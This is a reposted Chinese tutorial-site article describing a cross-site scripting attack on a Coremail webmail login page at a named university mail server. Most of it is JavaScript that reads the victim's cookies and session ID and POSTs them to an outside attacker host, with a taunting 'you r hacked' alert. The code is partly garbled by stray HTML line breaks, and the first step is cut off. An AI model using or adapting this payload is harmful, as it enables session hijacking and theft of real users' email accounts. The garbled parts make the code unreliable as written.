来源:自学PHP网 时间:2023-02-02 14:52 作者: 阅读:次
[导读] 写代码我真的是小菜鸟 估计很多地方语法错误,大家将就着看吧..浏览器的bypass我就不说了 我的方法在IE8下无法实现的.1、首先在http://mail.bnu.edu.cn/coremail/forgetpwd1.jsp?uid=%22%3E%3Cscript%20src...
写代码我真的是小菜鸟 估计很多地方语法错误,大家将就着看吧.. 浏览器的bypass我就不说了 我的方法在IE8下无法实现的.
2、比如 因为在coremail里 验证是靠sid来进行的。但是sid是写在链接里的 当然cookie里也有个叫coremail.sid。。。。呵呵呵 var my_post = ""; var b,c,d,mail_cookies; var xhr; document.write("<iframe height="0" id="hacker" name="hacker" src=" width="0">");<br> b = document.frames["hacker"].document.getElementsByName("indexFrame");< br> c = b.split(/gmain\.jsp\?sid\=/);<br> mail_cookies = document.cookie;<br> function xhr(){<br> if (window.XMLHttpRequest)<br> {<br> xhr=new XMLHttpRequest(); <br> }<br> else<br> {<br> xhr=new ActiveXObject("Microsoft.XMLHTTP");<br> }<br> }<br> function callback(){<br> if (xhr.readyState == 4) {<br> if (xhr.status == 200 ) {<br> alert(/you r hacked /.source);<br> }<br> }<br> }<br> function inject(){<br> xhr();<br> xhr.open("POST","http://www.blackh4t.org/receive.php",true);<br> xhr.onreadystatechange = callback;<br> xhr.send(mail_cookies + "<br> " + c);<br> }<br> xhr();<br> inject();</iframe> |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com